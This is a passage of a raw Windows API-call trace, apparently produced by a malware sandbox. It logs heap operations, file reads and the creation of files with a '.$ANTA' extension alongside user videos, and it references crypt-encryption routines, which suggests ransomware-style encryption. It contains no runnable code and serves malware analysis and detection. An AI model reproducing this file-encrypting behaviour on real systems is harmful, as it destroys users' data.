Flags=0x0, Size=0x4) returned 0x43e2910 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da858 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da858 | out: hHeap=0x1780000) returned 1 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0102.565] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0102.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0102.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0102.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0102.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0102.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\s4mxeg0vr.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0102.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0102.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0102.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0102.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0102.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0102.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.566] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0102.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0102.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0102.567] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0102.567] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0102.567] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0102.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0102.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0102.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0102.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0102.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0102.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0102.572] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0102.572] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x5fd0, lpOverlapped=0x0) returned 1 [0102.573] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0102.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0102.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5fd0) returned 0x4516010 [0102.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0102.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0102.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0102.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0102.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0102.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5fd0) returned 0x451bfe8 [0102.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0102.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.577] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5fd0) returned 0x4516010 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.578] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0102.579] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0102.579] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0102.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0102.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5fd0) returned 0x4516010 [0102.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2950 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2990 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0102.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0102.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a80 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0102.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5fd0) returned 0x4521fc0 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0102.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0102.581] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0102.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0102.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0102.581] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0102.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0102.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.582] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0102.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0102.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ad0 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0102.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0102.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0102.582] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0102.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.583] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: 